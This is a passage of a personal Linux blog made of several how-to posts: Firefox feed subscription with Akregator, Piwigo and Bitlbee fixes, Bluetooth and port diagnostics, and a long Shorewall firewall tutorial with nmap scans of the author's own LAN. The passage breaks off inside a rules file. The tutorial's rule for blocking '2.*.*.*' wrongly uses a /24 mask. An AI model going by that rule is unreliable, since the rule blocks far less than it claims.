Adding “Subscribe” button to Firefox for quick and easy RSS Feed link creation. Configuring Akregator as a default Feed reader.

Hi there.

I like to use RSS feed reader for stuff that I follow like for example YouTube channels, forum threads, blogs or even e-bay searches. Sometimes (often) website does not provide a subscription button. What to do? How to live? Well there is a simple solution for Firefox users. Add “Subscribe” button to the toolbar. How?

1) Right click on the toolbar (somewhere on a free space between buttons and choose “Customize“.

Adding

2) “Customize Toolbar” window will pop up.

Adding

3) Find the “Subscribe” button. Left click on it, hold and drag the mouse pointer to the chosen place on a toolbar till You will see a black line to the left of it. Release the left click.

Adding

4) Visit Your favorite Youtube channel or other page You would like to subscribe to (like a blog or a forum thread) and click on the “Subscribe” button on the toolbar.

Adding

IF the button is “grayed out” it means that the website does not provide RSS Feed (shame on You Twitter!) and in this case it’s a bummer… If however the button is “clickable” You are few clicks away from Your personal happiness ;)… You can now either copy the link and use it in some terminal RSS Feed reader ie. Newsbeuter OR You can set it up with some gui tool like Akregator.

Setting up with Akregator is easy.

1) Unfold the “Live Bookmarks” dropdown menu and click on “Choose Application”.

Configuring Akregator as a default Feed reader step 001

2) File browser window will pop up. Navigate to /usr/bin/ find akregator executable, click on it and then click Open.

Configuring Akregator as a default Feed reader step 002

3) Unfold the “Live Bookmarks” dropdown menu and click on “akregator”.

Configuring Akregator as a default Feed reader step 003

It is optional to tick the box “Always use akregator to subscribe to feed” – if You choose to do so next time You will click the “Subscribe” button on a toolbar the link will be sent straight to Akregator.

4) Click “Subscribe Now”.

Configuring Akregator as a default Feed reader step 004

5) Akregator will inform You that a new feed was added. You can now go thru the latest news from the channel that You chose to add.

Configuring Akregator as a default Feed reader step 005

That’s it. You are all done. “Subscribe” button is in place. Akregator is configured as a default RSS Feed reader.

Cheers.

Andrzej

P.S. You can use this method to customize toolbar with other buttons too. You can move, add and remove most of the toolbar elements. Mess around with it till You get what You want :).

[SOLVED] Piwigo: Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /var/www/html/images/admin/include/themes.class.php on line 697

Hi there.

Sometime ago I have noticed that Piwigo is throwing this error:

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /var/www/html/images/admin/include/themes.class.php on line 697

flooding the screen when I was logged in as administrator and messing with the Administration settings (and not only). It caused absolutely nothing beside the flood of error messages. I searched for help and could not find anything. It was weird since I had error_reporting set to false in /etc/php/php.ini. Olgierd helped me by pointing out line 104 in file common.inc.php (@ini_set(‘display_errors’, true);) in the Piwigo installation folder.

In my case the file was located in the:

/var/www/html/images/include/common.inc.php

but general rule of thumb is:

./include/common.inc.php

inside Your Piwigo installation folder.

Use Your favorite text editor (as root) and change the line from:

@ini_set(‘display_errors’, true);

@ini_set(‘display_errors’, false);

and then restart the httpd service.

Few days ago after upgrading from Piwigo 2.6.0 to 2.6.1 error was back and I had to search for the solution in my IM logs which was a major PITA – hence this post. I suppose this will be something I will have to deal with after some (if not each) upgrades but now that I have easy access to a solution and I know what needs to be done I see no problem with that.

Thanks Olgierd.

Cheers.

Andrzej

Bitlbee 3.2.1 compiled against minimal installation of libpurple and patched so it retains gadu-gadu contacts upon Bitlbee server restart.

Hi.

Previous patch for Bitlbee stopped working so I have joined Bitlbee irc channel and asked for help. Dx picked up the challenge and wrote a new patch (15 minutes or so… Lawd I wish I had a brain so I could hack the code like that…)

More to the story + some useful info can be found here.

Cheers.

Andrzej

P.S. If You want to encrypt Your Bitlbee traffic use Stunnel :).

System logs indicates that one of my local machines keeps poking my other machine on port 21817/udp. WTF?!

Hi folks.

Noticed weird entries in journalctl:

Jan 14 00:38:25 wishmasus.loc kernel: Shorewall:net2fw:DROP:IN=docketh1 OUT= MAC=00:xx:yy:xz:Zs:Ss SRC=OtherLocalMachine DST=MyMachine LEN=151 TOS=0x00 PREC=0x00 TTL=64 ID=24209 DF PROTO=UDP SPT=21817 <<<<< SOURCE PORT IT TRIED TO REACH DPT=37647 LEN=131

I hate to see stuff like this especially if I don’t know where it comes from so I went to the machine that traffic came from and ran (as root):

netstat -lnp | grep 21817

just to find out that…

tcp 0 0 0.0.0.0:21817 0.0.0.0:* LISTEN 664/skype
udp 0 0 0.0.0.0:21817 0.0.0.0:* 664/skype

somebody left Skype running…

Ports can vary…

tcp 0 0 0.0.0.0:37647 0.0.0.0:* LISTEN 1956/skype
udp 0 0 0.0.0.0:37647 0.0.0.0:* 1956/skype

and it does not have to be Skype… but if You have a funny messages from shorewall in Your system journal – You can try searching for the source of them if You have access to the machine that sends them…

Cheers.

Andrzej

Listing all / gathering information about currently connected bluetooth devices.

Hi there.

SO I was working on my Arch Linux powered Asus V1S laptop this morning and I have noticed that my bluetooth had 1 connected client device…

Connected Bluetooth Device Info

I was almost sure that it wasn’t one of my devices so I got curious / little worried.

How can You list all the current bluetooth connections? The answer was simple although it took me a bit to figure it out:

hcitool con

It will list all the MAC addresses of the devices Your adapter is currently connected to / with:

Connections:
> ACL ZZ:AA:TT:PP:88:33 handle 42 state 1 lm MASTER

Now if You want to know more about any of those devices use this command:

hcitool info ZZ:AA:TT:PP:88:33

Just don’t forget to replace devices MAC address ZZ:AA:TT:PP:88:33 with the MAC address of the connected device.

[andrzejl@wishmasus ~]$ hcitool info ZZ:AA:TT:PP:88:33
Requesting information …
BD Address: ZZ:AA:TT:PP:88:33
OUI Company: Nokia BLAH BLAH
Device Name: AndrzejL_Blah
MOAR BLAH
[andrzejl@wishmasus ~]$

Turns out it was one of my devices that was connected… 😉

Command hcitool can be used for many other things. To find out more read:

hcitool --help

and

man hcitool

Cheers.

Andrzej

‘HALP I locked meself out of bitlbee’ aka resetting Your bitlbee password.

Hi there.

Yes… I did it… 2 days ago I have locked myself out of my own bitlbee account :). Easy fix if You have root on the machine that the bitlbee server runs on tho.

Get root:

su

Stop the bitlbee service. In Arch Linux that would be done with:

systemctl stop bitlbee

Move Yourself to where bitlbee stores the accout xml files.

cd /var/lib/bitlbee

List the content of the folder and filter listing for xml files.

ls ./ | grep -i xml

You will get something like:

yourbitlbeelogin.xml

obviously instead of yourbitlbeelogin You will see Your actual login for Your bitlbee server.

Now generate new md5 hash for Your new password:

bitlbee -x hash yournewpassword

Replace yournewpassword with Your actual new password for bitlbee server. Terminal will spit out something like:

7EcI4byy9MgrAPiK9

Write it down / copy it – whatever floats Your boat.

Use mcedit / nano / vi / emacs / joe – whatever suits You and open yourbitlbeelogin.xml.

mcedit ./yourbitlbeelogin.xml

First line will look somewhat like this:

user nick=”yourbitlbeelogin” password=”md5hashofyouroldbitlbeepassword” version=”1″

Remove the md5hashofyouroldbitlbeepassword bit and replace it with the new md5 hash that You have just generated for yournewpassword so it looks like this:

user nick=”yourbitlbeelogin” password=”7EcI4byy9MgrAPiK9″ version=”1″

Save the file and re-start Your bitlbee service.

systemctl start bitlbee

Use yournewpassword to log into the bitlbee server.

Because bitlbee uses Your password (or its hash – not sure) to create hashes of passwords for Your accounts (jabber / gadu-gadu / msn etc.) after manually editing that .xml file You won’t be able to log into any of those accounts – they will reject Your passwords as incorrect. You need to re-set all the account passwords. Use:

account tag set password

on all Your accounts (luckily I only had 2) diconnect and reconnect back to the bitlbee server.

Tada… All is bitlbee with the world again.

Cheers.

Andrzej

Qualys SSL Labs Test results for AndrzejL.no-ip.org and Firefox TLSv1.2 fix.

Hi there.

I have been motivated by a new colleague to enable Forward Secrecy for WoTW WWW server. I did it. I have also tested the website on the Qualys SSL Labs website. Here are the results.

Qualys SSL Labs test results

As You can see I got quite high scores. I have failed only because the SSL Certificate was not trusted. I cannot get other certificate for no-ip domain simply because I do not own no-ip domain but only a subdomain. Plus in the times of Snowden’s revelations who really trusts Certificate Authorities when governments can force any CA to give up their master keys or to create valid certificate so they can snoop on SSL connections “test” something… Also I have decided (sometime ago) to disable all protocols but TLSv1.2. The SSL Labs test results say that this site will fail with many clients / browsers because of that… To this I say update / fix Your browsers people. I don’t care for browsers that cannot work with latest / greatest crypto. I don’t have to be compatible with older browsers. I would prefer to force people to use the latest / most secure protocols / browsers that work with them then allow compatibility between older browsers and my server by lowering crypto standards for my server.

Unfortunately I have noticed that Firefox has a problem with TLSv1.2 and since its my browser of choice I have investigated it. Here is a fix:

a) open browser
b) paste this into the address bar:

about:config?filter=security.tls.version.max

c) find variable

 

security.tls.version.max

 

 

d) double click on it
e) change its default value to:

 

3

 

 

f) close and re-open browser

There – fixed. Mozilla finally got their act together – upgrade Your browser to version 27 (or newer). There… now Your Firefox can work with latest TLS version…

For those that want to know more here is the link. For those that will be complaining about the compatibility with older websites I say this – IF the server does not provides TLSv1.2 then why bother providing https at all? Those servers are outdated and/or badly configured. None of these is good for security.

And another thing… Bank of Ireland had weaker scores then my site and provides no Forward Secrecy…

Bank Of Ireland Qualys SSL Labs Test Results

Of course they got A grade. Their cert is valid.

Cheers.

Andrzej

Configuring shorewall for LAN ipv4 connection.

Hi folks.

What is shorewall? Well this is not a Wikipedia so I won’t go into the details. Suffice to say it’s a firewall. I must underline here that I am in no way expert on security subject neither am I a firewall expert. I am posting this info for my own use as those settings have served me well (unlike my memory) in the past and I would like to re-use them in the future without struggling to remember – but if You want to use them (and maybe later improve them to suite Your needs) then go ahead – feel free to do so just be aware that I am taking no responsibility whatsoever for the security of Your machine and consequences of it getting hacked. I hereby confirm that this config is what I use at home and that it’s safe and secure to my best of knowledge.

Here it goes:

1) First install the shorewall

su

give it root’s password

pacman -S shorewall

resolving dependencies…
looking for inter-conflicts…

Packages (1): shorewall-4.5.19-1

Total Installed Size: 2.23 MiB

:: Proceed with installation? [Y/n] y
(1/1) checking keys in keyring [###############################################] 100%
(1/1) checking package integrity [###############################################] 100%
(1/1) loading package files [###############################################] 100%
(1/1) checking for file conflicts [###############################################] 100%
(1/1) checking available disk space [###############################################] 100%
(1/1) installing shorewall [###############################################] 100%

2) Enable shorewall at boot time.

systemctl enable shorewall

You should see this as an output:

ln -s ‘/usr/lib/systemd/system/shorewall.service’ ‘/etc/systemd/system/multi-user.target.wants/shorewall.service’

3) Find out what network interfaces do You have:

ip link

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT qlen 1000
link/ether 00:1e:52:7a:46:5d brd ff:ff:ff:ff:ff:ff
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT qlen 1000
link/ether 00:0a:e4:f6:d4:8f brd ff:ff:ff:ff:ff:ff

4) Check what ports are open on the machine before shorewall gets configured and started (optional) by scanning it from another machine using nmap. wishmacer is using 192.168.0.100 ip addy and I am scanning it from another local machine icsserver which is using 192.168.0.1 ip addy:

date && nmap -p 0-65535 192.168.0.100 && date

Hint: You will be able to see the ETA if You press space durring the scan.

Sat Aug 10 17:04:03 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:04 IST
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 4.46% done; ETC: 17:41 (0:00:21 remaining)
Nmap scan report for 192.168.0.100
Host is up (0.00014s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
7634/tcp open hddtemp
50505/tcp open unknown
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 16.37 seconds
Sat Aug 10 17:04:20 IST 2013

It took 16.5 seconds roughly to scan all the 65536 ports and it discovered 2 open tcp ports 7634 and 50505.

5) Configure shorewall accordingly:

To configure shorewall You will use Your favorite text editor (vi, mcedit, nano etc. whatever ails You) as root. Config files are stored in the folder:

/etc/shorewall

A) /etc/shorewall/shorewall.conf

Find and change values:

STARTUP_ENABLED=No

AUTOMAKE=No

BLACKLIST="NEW,INVALID,UNTRACKED"

from

No

to

Yes

and from

"NEW,INVALID,UNTRACKED"

to

ALL

So they look like this:

STARTUP_ENABLED=Yes

AUTOMAKE=Yes

BLACKLIST=ALL

Now check if your shorewall.conf contains an entry (if you have the latest version of shorewall from ArchLinux repository and you’ve merged your .pacnew file it will):

WORKAROUND=Yes

and if it does – change it to:

WORKAROUND=No

Why? Workarounds are needed for non-modern distros like Debian or CentOS. ArchLinux does not need them.

B) /etc/shorewall/zones

Add these 2 lines at the end of the file:

net ipv4
#LAST LINE - ADD YOUR ENTRIES ABOVE THIS ONE - DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 – Zones File
#
# For information about this file, type “man shorewall-zones”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-zones.html
#
##################################
#ZONE TYPE OPTIONS IN OUT
# OPTIONS OPTIONS
fw firewall
net ipv4
#LAST LINE – ADD YOUR ENTRIES ABOVE THIS ONE – DO NOT REMOVE

C) /etc/shorewall/interfaces

Here You will use the info gathered in point 4. So in my case network interfaces are eth0 and wlan0 – wireless network is not used at the moment (but we will define it anyway) and the interface eth0 is connected to my router.

Add these 3 lines at the end of the file:

net eth0 -
net wlan0 -
#LAST LINE -- DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 – Interfaces File
#
# For information about entries in this file, type “man shorewall-interfaces”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-interfaces.html
#
##################################
FORMAT 2
##################################
#ZONE INTERFACE OPTIONS
net eth0 –
net wlan0 –
#LAST LINE — DO NOT REMOVE

D) /etc/shorewall/policy

Add these 4 lines to the end of the file:

fw net ACCEPT
net all DROP info
all all DROP info
#LAST LINE -- DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 – Policy File
#
# For information about entries in this file, type “man shorewall-policy”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-policy.html
#
##################################
#SOURCE DEST POLICY LOG LIMIT: CONNLIMIT:
# LEVEL BURST MASK
fw net ACCEPT
net all DROP info
all all DROP info
#LAST LINE — DO NOT REMOVE

6) Start shorewall:

systemctl start shorewall

7) Check it’s status:

journalctl -xn

— Logs begin at Fri 2013-08-09 23:23:46 IST, end at Sat 2013-08-10 17:01:44 IST. —
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Martian Logging…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Proxy ARP…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Preparing iptables-restore input…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Running /sbin/iptables-restore…
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: IPv4 Forwarding Enabled
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/start …
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/started …
Aug 10 17:01:44 wishmacer.loc logger[2279]: Shorewall started
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: done.
Aug 10 17:01:44 wishmacer.loc systemd[1]: Started Shorewall IPv4 firewall.
— Subject: Unit shorewall.service has finished start-up
— Defined-By: systemd
— Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel

— Unit shorewall.service has finished starting up.

— The start-up result is done.

systemctl status shorewall

shorewall.service – Shorewall IPv4 firewall
Loaded: loaded (/usr/lib/systemd/system/shorewall.service; enabled)
Active: active (exited) since Sat 2013-08-10 17:01:44 IST; 2min 57s ago
Process: 2069 ExecStart=/usr/bin/shorewall $OPTIONS start (code=exited, status=0/SUCCESS)

Aug 10 17:01:42 wishmacer.loc systemd[1]: Starting Shorewall IPv4 firewall…
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Compiling…
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: perl: warning: Setting locale failed.
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: perl: warning: Please check that your locale settings:
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: LANGUAGE = (unset),
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: LC_ALL = (unset),
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: LANG = “en_UK.UTF-8”
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: are supported and installed on your system.
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: perl: warning: Falling back to the standard locale (“C”).
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/params …
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/shorewall.conf…
Aug 10 17:01:42 wishmacer.loc shorewall[2069]: Loading Modules…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/zones…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/interfaces…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Determining Hosts in Zones…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Locating Action Files…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/policy…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Running /etc/shorewall/initdone…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling Kernel Route Filtering…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling Martian Logging…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling MAC Filtration — Phase 1…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/rules…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /etc/shorewall/conntrack…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling MAC Filtration — Phase 2…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Applying Policies…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /usr/share/shorewall/action.Drop for chain Drop…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /usr/share/shorewall/action.Broadcast for chain Broadcast…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Generating Rule Matrix…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Compiling /usr/share/shorewall/action.Reject for chain Reject…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Creating iptables-restore input…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Shorewall configuration compiled to /var/lib/shorewall/.start
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Starting Shorewall….
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Initializing…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/init …
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/tcclear …
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Route Filtering…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Martian Logging…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Setting up Proxy ARP…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Preparing iptables-restore input…
Aug 10 17:01:43 wishmacer.loc shorewall[2069]: Running /sbin/iptables-restore…
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: IPv4 Forwarding Enabled
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/start …
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: Processing /etc/shorewall/started …
Aug 10 17:01:44 wishmacer.loc logger[2279]: Shorewall started
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: done.
Aug 10 17:01:44 wishmacer.loc systemd[1]: Started Shorewall IPv4 firewall.

8) Check if its working as expected (optional) and scan it from another machine using nmap. wishmacer is using 192.168.0.100 ip addy and I am scanning it from another local machine icsserver which is using 192.168.0.1 ip addy:

Hint: You will be able to see the ETA if You press space during the scan.

date && nmap -p 0-65535 192.168.0.100 && date

Sat Aug 10 17:14:00 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:14 IST
Stats: 0:10:22 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 46.31% done; ETC: 17:36 (0:11:46 remaining)
Stats: 0:21:33 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 97.43% done; ETC: 17:36 (0:00:34 remaining)
Nmap scan report for 192.168.0.100
Host is up (0.00016s latency).
All 65536 scanned ports on 192.168.0.100 are filtered
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 1327.34 seconds
Sat Aug 10 17:36:07 IST 2013

It took 22 minutes roughly to scan all the 65536 ports. All of them are closed / filtered.

9) Add Your custom rules. For example on Wishmacer / 192.168.0.100 I have a service running at tcp port 50505. I want to open it.

Modify this file:

/etc/shorewall/rules

by adding those 2 lines:

ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 – Rules File
#
# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
?SECTION ALL
?SECTION ESTABLISHED
?SECTION RELATED
?SECTION INVALID
?SECTION UNTRACKED
?SECTION NEW
# Allow access to port 50505 TCP – SSHD
ACCEPT net fw tcp 50505 –
#LAST LINE — DO NOT REMOVE

and restart Your firewall using this command:

systemctl restart shorewall

and test if it worked from a different machine:

date && nmap -p 7634 192.168.0.100 && date

Sat Aug 10 17:48:25 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:48 IST
Nmap scan report for 192.168.0.100
Host is up (0.00016s latency).
PORT STATE SERVICE
7634/tcp filtered hddtemp
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
Sat Aug 10 17:48:38 IST 2013

date && nmap -p 50505 192.168.0.100 && date

Sat Aug 10 17:48:45 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:48 IST
Nmap scan report for 192.168.0.100
Host is up (0.00019s latency).
PORT STATE SERVICE
50505/tcp open unknown
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
Sat Aug 10 17:48:59 IST 2013

As You can see port 7634 which was previously (before shorewall configuration / start) open is now marked as filtered and the 50505 which I chose to open on my firewall is now open and ready to use.

Now You can add more lines in this configuration file. Different ports, different protocols, different rules.

Example if You want to add port 123 udp as open add this line:

ACCEPT net fw udp 123 -

so it looks like this:

#
# Shorewall version 4 – Rules File
#
# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
ACCEPT net fw udp 123 –
ACCEPT net fw tcp 50505 –
#LAST LINE — DO NOT REMOVE

save the file and restart firewall as You did before.

And what if I want to open a large range of ports? Lets say… I want to open 250 TCP ports starting at 5000?

No problem – add another rule that looks like this:

ACCEPT net fw tcp 5000:5250 -

so it looks like this:

#
# Shorewall version 4 – Rules File
#
# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
ACCEPT net fw udp 123 –
ACCEPT net fw tcp 5000:5250 –
ACCEPT net fw tcp 50505 –
#LAST LINE — DO NOT REMOVE

save the file and restart firewall as You did before.

Ok Andy… I have a problem… I cannot ping the machine anymore after the shorewall was started…

Ok… I am guessing You want the machine to respond to ping for whatever the reason.

Add this as a rule:

Ping(ACCEPT) net fw

so it looks like this:

#
# Shorewall version 4 – Rules File
#
# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 –
ACCEPT net fw tcp 5000:5250 –
ACCEPT net fw tcp 50505 –
#LAST LINE — DO NOT REMOVE

save the file and restart firewall as You did before.

If You want to block a pest (lets assume IP 1.2.3.4) that is messing with Your server add this line:

DROP net:1.2.3.4 all

so it looks like this:

#
# Shorewall version 4 – Rules File
#
# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP net:1.2.3.4 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 –
ACCEPT net fw tcp 5000:5250 –
ACCEPT net fw tcp 50505 –
#LAST LINE — DO NOT REMOVE

save the file and restart firewall as You did before.

If the pest is using a dynamic IP and You know the range (lets assume IP 2.*.*.*) then add this line:

DROP net:2.0.0.0/24 all

so it looks like this:

#
# Shorewall version 4 – Rules File
#
# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP net:1.2.3.4 all
DROP net:2.0.0.0/24 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 –
ACCEPT net fw tcp 5000:5250 –
ACCEPT net fw tcp 50505 –
#LAST LINE — DO NOT REMOVE

save the file and restart firewall as You did before.

It’s very important that You place the DROP lines before the ACCEPT lines.

If You want to forward a port (destination nat) to another IP / machine add a rule that will do it for You. Example:

I have 2 NICs in my machine.

– First has IP 192.168.1.50 and is defined as a wan zone.
– Second has IP 192.168.0.1 and is recognized by shorewall as a net zone.

There is another machine in my net zone. The machine’s IP is 192.168.0.100.

I want to forward port 4000 (both TCP and UDP) from the wan zone – IP 192.168.1.50 to the port 4000 on the net zone machine with the IP 192.168.0.100. This means that if any packet will land on the port 4000 on the 192.168.1.50 machine it will be redirected (forwarded / dnated) to the port 4000 on the 192.168.0.100 machine.

The rule will look like this:

DNAT wan net:192.168.0.100 tcp 4000 - 192.168.1.50
DNAT wan net:192.168.0.100 udp 4000 - 192.168.1.50

and the rules file will look like this:

#
# Shorewall version 4 – Rules File
#
# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP net:1.2.3.4 all
DROP net:2.0.0.0/24 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 –
ACCEPT net fw tcp 5000:5250 –
ACCEPT net fw tcp 50505 –
DNAT wan net:192.168.0.100 tcp 4000 – 192.168.1.50
DNAT wan net:192.168.0.100 udp 4000 – 192.168.1.50
#LAST LINE — DO NOT REMOVE

save the file and restart firewall as You did before. Make sure that the port 4000 (both TPC and UDP) is open on the 192.168.0.100 machine. How?

su -c "nmap -Pn -p 4000 192.168.0.100 && nmap -sU -Pn -p 4000 192.168.0.100"

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up (0.00012s latency).
PORT STATE SERVICE
4000/tcp open remoteanything

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up.
PORT STATE SERVICE
4000/udp open|filtered icq

Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds

The situation will look slightly different if the destination port and source port number are different. The scenario described above still applies. 2 NICs, wan and net zones, another machine in the net zone.

I want to forward port 6118 (both TCP and UDP) from the wan zone – IP 192.168.1.50 to the port 6112 on the net zone machine with the IP 192.168.0.100. This means that if any packet will land on the port 6118 on the 192.168.1.50 machine it will be redirected (forwarded / dnated) to the port 6112 on the 192.168.0.100 machine.

The rule will look like this:

DNAT wan net:192.168.0.100:6112 tcp 6118 - 192.168.1.50
DNAT wan net:192.168.0.100:6112 udp 6118 - 192.168.1.50

and the rules file will look like this:

#
# Shorewall version 4 – Rules File
#
